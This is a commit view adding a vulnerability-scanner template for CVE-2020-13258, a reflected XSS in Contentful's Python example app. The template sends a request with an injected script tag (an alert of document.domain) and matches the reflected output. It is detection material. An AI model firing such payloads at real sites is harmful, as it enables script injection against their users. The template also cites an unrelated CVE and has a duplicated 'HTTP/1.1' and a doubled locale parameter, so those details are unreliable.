commit
d95c92dde2
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-13258
|
||||
|
||||
info:
|
||||
name: Contentful - Reflected XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: |
|
||||
Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.
|
||||
reference:
|
||||
- https://github.com/contentful/the-example-app.py/issues/44
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
|
||||
tags: cve,cve2020,contentful,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "{'api': '"
|
||||
- "</script><script>alert(document.domain)</script>',"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue